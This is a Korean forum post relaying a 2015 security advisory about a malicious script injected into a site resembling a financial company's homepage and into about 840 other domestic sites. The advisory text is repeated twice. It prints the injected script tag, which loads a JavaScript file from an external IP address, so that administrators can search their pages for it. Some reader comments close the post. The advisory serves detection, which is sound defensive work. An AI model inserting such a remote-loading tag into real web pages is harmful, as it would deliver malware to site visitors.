홈페이지 악성 스크립트 삽입 관련 분석 및 대응(보안이슈) 정보
홈페이지 악성 스크립트 삽입 관련 분석 및 대응(보안이슈)
본문
2015.06.29. 08:24 금융회사 홈페이지로 오인될 수 있는 사이트*에
악성 스크립트가 삽입되어 있는 정황 탐지되었습니다.
해당 사이트 메인페이지에 악성 스크립트가 삽입되어 있으므로 홈페이지 및 서버 관리자는 아래의 스크립트를 탐색해시면 됩니다.
<script type=“text/javascript” src=“http://121.67.183.105:83/MEDIA/holder.js”></script>
현재 악성 스크립트는 삭제되어 있으나, 서버는 활성화 되어 있고
국내에서 접속이 가능한 상황으로 악성 스크립트가 재활성화될 경우
악성코드가 다시 유포될 것으로 판단된다고 합니다.
해당 악성 스크립트에 대한 연관성 분석 결과, 국내 840여개
사이트에 해당 스크립트가 삽입되어 있습니다.
악성 스크립트가 삽입되어 있는 정황 탐지되었습니다.
해당 사이트 메인페이지에 악성 스크립트가 삽입되어 있으므로 홈페이지 및 서버 관리자는 아래의 스크립트를 탐색해시면 됩니다.
<script type=“text/javascript” src=“http://121.67.183.105:83/MEDIA/holder.js”></script>
현재 악성 스크립트는 삭제되어 있으나, 서버는 활성화 되어 있고
국내에서 접속이 가능한 상황으로 악성 스크립트가 재활성화될 경우
악성코드가 다시 유포될 것으로 판단된다고 합니다.
해당 악성 스크립트에 대한 연관성 분석 결과, 국내 840여개
사이트에 해당 스크립트가 삽입되어 있습니다.
추천
2
2
댓글 3개
진짜 이건 좋은 팁인듯 합니다.
감사합니다. 조심 또 조심해야되겠어요..ㅜㅜ
그렇죠 뭐 ㅎㅎ.... 항상 의심스러운 자바나 태그들은 확인 또 확인을 .. ㅎㅎ;